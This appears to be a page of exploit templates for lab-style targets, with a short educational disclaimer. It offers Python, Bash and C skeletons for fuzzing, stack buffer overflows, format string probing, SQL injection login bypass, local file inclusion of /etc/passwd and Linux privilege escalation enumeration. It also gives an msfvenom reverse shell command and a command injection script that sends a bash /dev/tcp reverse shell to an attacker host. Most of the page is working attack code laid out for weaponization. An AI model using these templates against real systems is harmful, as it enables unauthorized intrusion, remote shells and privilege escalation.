Exploit Template Snippets
Exploit Template Snippets — Build, Fire, Pwn
⚠️ For educational and authorized use only. These templates are designed to help you understand exploit logic, structure, and automation — not for unauthorized testing.
I. 🧩 Exploit Workflow Anatomy
1. Enumeration
Identify service, port, version, input vector.
2. Fuzzing
Trigger crash with payload.
3. Debugging
Attach debugger (gdb/Immunity).
4. Exploit Development
Build PoC (controlled crash → EIP control → RCE).
5. Weaponization
Add reverse shell, privilege escalation, persistence.
II. 🧠 Python Exploit Template — TCP / Socket PoC
#!/usr/bin/env python3
import socket, sys, time
target = "10.10.10.5"
port = 1337
payload = b"A" * 100 # initial fuzz buffer
print(f"[+] Connecting to {target}:{port}")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
print("[+] Sending payload...")
s.send(payload)
print("[+] Payload sent. Check target.")
s.close()III. 🧱 Python Fuzzing Skeleton
#!/usr/bin/env python3
import socket, time
ip = "10.10.10.5"
port = 9999
buffer = b"A" * 100
while True:
try:
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((ip, port))
s.send(buffer)
print(f"[+] Sent {len(buffer)} bytes")
s.close()
time.sleep(1)
buffer += b"A" * 100
except:
print(f"[!] Crashed at {len(buffer)} bytes!")
break✅ Use this to find offset/crash point with !mona pattern_create/pattern_offset.
IV. 🧠 Buffer Overflow Skeleton (Python)
#!/usr/bin/env python3
import socket, sys
target = "10.10.10.5"
port = 9999
offset = 524
retn = b"\xf3\x12\x17\x31" # little endian (jmp esp)
nop = b"\x90" * 16
shellcode = b"" # msfvenom payload goes here
payload = b"A" * offset + retn + nop + shellcode
print(f"[+] Sending exploit to {target}:{port}")
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((target, port))
s.send(payload)
s.close()🔹 Example msfvenom command
msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.2 LPORT=4444 -b "\x00" -f pythonV. ⚙️ Bash Exploit Template (Network)
#!/bin/bash
# Basic socket exploit example
host="10.10.10.5"
port=8080
payload="GET /vuln?cmd=id HTTP/1.1\r\nHost: $host\r\n\r\n"
echo -e "$payload" | nc $host $portVI. 🧠 Exploit Skeleton — Web Command Injection
import requests
url = "http://target/vuln.php"
cmd = "id"
payload = {"cmd": f"$( {cmd} )"}
r = requests.post(url, data=payload)
print(r.text)Enhancements:
Add threading for brute-force.
Integrate reverse shell or file upload for escalation.
VII. 🧩 Exploit Skeleton — Format String
#!/usr/bin/env python3
import socket, struct
def p(x): return struct.pack("<I", x)
target = ("10.10.10.5", 1337)
payload = b"%p " * 10 # test for format string vuln
s = socket.socket()
s.connect(target)
s.send(payload)
print(s.recv(4096))
s.close()VIII. 🧱 C Exploit Skeleton (Linux Socket)
#include <stdio.h>
#include <string.h>
#include <sys/socket.h>
#include <arpa/inet.h>
#include <unistd.h>
int main(){
int s = socket(AF_INET, SOCK_STREAM, 0);
struct sockaddr_in server;
server.sin_addr.s_addr = inet_addr("10.10.10.5");
server.sin_family = AF_INET;
server.sin_port = htons(1337);
connect(s, (struct sockaddr *)&server, sizeof(server));
char payload[512];
memset(payload, 'A', 512);
send(s, payload, strlen(payload), 0);
close(s);
return 0;
}Compile:
gcc exploit.c -o exploitIX. 🧠 Python Exploit Template — Auth Bypass / SQLi
import requests
url = "http://target/login"
payload = "' OR '1'='1"
data = {"username": payload, "password": "pass"}
r = requests.post(url, data=data)
if "Welcome" in r.text:
print("[+] Auth bypass successful")
else:
print("[-] Failed")X. 🧩 Exploit Template — Command Injection → Reverse Shell
import requests
target = "http://10.10.10.5/vuln"
lhost = "10.10.14.3"
lport = "4444"
cmd = f"bash -c 'bash -i >& /dev/tcp/{lhost}/{lport} 0>&1'"
payload = {"cmd": cmd}
requests.post(target, data=payload)XI. ⚙️ Exploit Template — LFI to RCE
import requests
url = "http://target/vuln?file="
file = "../../../../../../etc/passwd"
r = requests.get(url + file)
print(r.text)Combine with /proc/self/environ or PHP session inclusion for RCE.
XII. 🧩 Privilege Escalation Automation Skeleton (Linux)
#!/bin/bash
echo "[+] Starting PrivEsc..."
whoami
sudo -l
find / -perm -4000 2>/dev/null
find / -type f -writable 2>/dev/null
cat /etc/crontab
getcap -r / 2>/dev/null
echo "[+] Done."XIII. ⚡ Exploit Output Parsing Template
import subprocess, re
output = subprocess.check_output("nmap -sV target", shell=True, text=True)
matches = re.findall(r"(\d+)/tcp\s+open\s+(\S+)", output)
for port, service in matches:
print(f"[+] Port {port} running {service}")XIV. 🧠 Exploit Development Checklist
1️⃣
Fuzz the input (crash discovery)
2️⃣
Find offset (EIP overwrite)
3️⃣
Identify bad chars
4️⃣
Find JMP ESP or pivot gadget
5️⃣
Build payload (shellcode + NOP sled)
6️⃣
Validate with debugger
7️⃣
Automate exploitation
8️⃣
Add reverse shell or file write
XV. 🧱 Useful Libraries for Exploit Dev
pwntools
Exploit development & automation
requests
Web-based exploits
socket
Network connections
struct
Packing/unpacking addresses
subprocess
Local command execution
re
Regex parsing for responses
ctypes
Low-level binary handling
XVI. ⚡ Pwntools Example Template
from pwn import *
target = process('./vuln')
context(arch='amd64', os='linux')
offset = 72
payload = flat({offset: p64(0xdeadbeef)})
target.sendline(payload)
target.interactive()Last updated
Was this helpful?